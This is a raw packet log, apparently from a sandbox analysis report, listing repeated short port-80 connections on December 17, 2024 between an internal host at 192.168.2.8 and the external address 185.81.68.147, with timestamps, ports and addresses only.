                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.821011066 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.012465000 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.012542009 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.013775110 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.016763926 CET4971980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.129611969 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.138014078 CET8049719185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.249525070 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.249644995 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.249710083 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.369620085 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.369688034 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.489645958 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:27.866368055 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:27.866579056 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:27.866689920 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:27.878808022 CET4972080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:27.996803999 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:27.998826981 CET8049720185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:28.116945028 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:28.117048025 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:28.117160082 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:28.238147974 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:28.238224983 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:28.359663010 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.714298010 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.714317083 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.714411974 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.716026068 CET4972180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.817298889 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.835932970 CET8049721185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.937335014 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.937511921 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.937633038 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:30.059750080 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:30.060058117 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:30.181723118 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.386472940 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.386599064 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.386650085 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.387959957 CET4972280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.489016056 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.507664919 CET8049722185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.608994007 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.609251022 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.609347105 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.729135990 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.729286909 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.849158049 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.076090097 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.076129913 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.076257944 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.077523947 CET4972380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.192167044 CET4972480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.197348118 CET8049723185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.312176943 CET8049724185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.312272072 CET4972480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.312313080 CET4972480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.432154894 CET8049724185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.432239056 CET4972480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.553946018 CET8049724185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:34.915150881 CET8049724185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:34.915265083 CET8049724185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:34.915420055 CET4972480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:34.916714907 CET4972480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:35.020361900 CET4972580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:35.036446095 CET8049724185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:35.140407085 CET8049725185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:35.140599012 CET4972580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:35.140712976 CET4972580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:35.262155056 CET8049725185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:35.262645006 CET4972580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:35.382874012 CET8049725185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:36.764745951 CET8049725185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:36.764830112 CET8049725185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:36.764888048 CET4972580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:36.768507004 CET4972580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:36.879949093 CET4972680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:36.890856981 CET8049725185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:36.999974966 CET8049726185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:37.000121117 CET4972680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:37.000196934 CET4972680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:37.124221087 CET8049726185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:37.124977112 CET4972680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:37.247097015 CET8049726185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:38.624203920 CET8049726185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:38.624217987 CET8049726185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:38.624288082 CET4972680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:38.625614882 CET4972680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:38.739475965 CET4972780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:38.749237061 CET8049726185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:38.862173080 CET8049727185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:38.862282038 CET4972780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:38.875072956 CET4972780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:38.994837046 CET8049727185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:38.994899035 CET4972780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:39.114914894 CET8049727185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.482171059 CET8049727185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.482304096 CET8049727185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.482353926 CET4972780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.483472109 CET4972780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.598398924 CET4972880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.608684063 CET8049727185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.720098972 CET8049728185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.720175982 CET4972880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.720248938 CET4972880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.844007015 CET8049728185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.844068050 CET4972880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:40.966588974 CET8049728185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.167386055 CET8049728185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.167490005 CET8049728185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.167547941 CET4972880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.168926001 CET4972880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.270181894 CET4972980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.288604021 CET8049728185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.390235901 CET8049729185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.390376091 CET4972980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.390440941 CET4972980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.511563063 CET8049729185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.511755943 CET4972980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:42.633774996 CET8049729185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.115782022 CET8049729185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.115940094 CET8049729185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.116054058 CET4972980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.117383957 CET4972980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.223426104 CET4973080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.237107992 CET8049729185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.344228983 CET8049730185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.344312906 CET4973080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.344408989 CET4973080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.464283943 CET8049730185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.464391947 CET4973080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:44.584306955 CET8049730185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:45.794629097 CET8049730185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:45.794955015 CET8049730185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:45.795017004 CET4973080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:45.796031952 CET4973080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:45.910958052 CET4973180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:45.916096926 CET8049730185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:46.030975103 CET8049731185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:46.031105042 CET4973180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:46.031214952 CET4973180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:46.151196003 CET8049731185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:46.151268959 CET4973180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:46.271116972 CET8049731185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.462456942 CET8049731185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.462568998 CET8049731185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.462629080 CET4973180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.471200943 CET4973180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.589767933 CET4973280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.590833902 CET8049731185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.709609985 CET8049732185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.709721088 CET4973280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.709819078 CET4973280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.829631090 CET8049732185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.829757929 CET4973280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:47.949516058 CET8049732185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.163413048 CET8049732185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.163770914 CET8049732185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.163867950 CET4973280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.164874077 CET4973280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.270309925 CET4973380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.287518978 CET8049732185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.391052961 CET8049733185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.391144037 CET4973380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.391196012 CET4973380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.513071060 CET8049733185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.513181925 CET4973380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:49.632977962 CET8049733185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.043869972 CET8049733185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.044054031 CET8049733185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.044136047 CET4973380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.045308113 CET4973380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.160851002 CET4973480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.205615997 CET8049733185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.403376102 CET8049734185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.403501034 CET4973480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.403578997 CET4973480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.523791075 CET8049734185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.523895025 CET4973480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:51.643790007 CET8049734185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.068607092 CET8049734185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.069279909 CET8049734185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.069376945 CET4973480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.116713047 CET4973480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.223496914 CET4973680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.236583948 CET8049734185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.343213081 CET8049736185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.343333006 CET4973680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.343363047 CET4973680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.463176966 CET8049736185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.463334084 CET4973680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:53.583165884 CET8049736185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:54.799954891 CET8049736185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:54.800090075 CET8049736185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:54.800179005 CET4973680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:54.801512003 CET4973680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:54.911036968 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:54.921344995 CET8049736185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:55.030774117 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:55.030884981 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:55.030926943 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:55.150846004 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:55.151540995 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:55.271553993 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.634978056 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.635107994 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.636110067 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.636110067 CET4973780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.738918066 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.756057978 CET8049737185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.858680010 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.858781099 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.858864069 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.978668928 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:56.978751898 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:57.098953009 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.508359909 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.508486986 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.508599043 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.509802103 CET4973880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.614702940 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.629491091 CET8049738185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.734536886 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.734680891 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.734740973 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.854844093 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.854907990 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:58.974567890 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.193325043 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.193492889 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.193909883 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.195796013 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.301690102 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.315706968 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.421422958 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.421552896 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.421674967 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.541668892 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.541811943 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.661511898 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.026175976 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.026490927 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.027401924 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.027401924 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.129544020 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.147085905 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.250161886 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.250255108 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.250353098 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.370096922 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.374135971 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.493957043 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:03.940649986 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:03.940783978 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:03.940841913 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:03.987761021 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.100778103 CET4974280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.107700109 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.220618963 CET8049742185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.220689058 CET4974280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.220741034 CET4974280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.340672016 CET8049742185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.340763092 CET4974280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.460477114 CET8049742185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:05.931310892 CET8049742185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:05.931555986 CET8049742185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:05.932360888 CET4974280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:05.932904959 CET4974280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.036081076 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.052824020 CET8049742185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.155841112 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.155999899 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.155999899 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.275726080 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.275787115 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.395940065 CET8049743185.81.68.147192.168.2.8
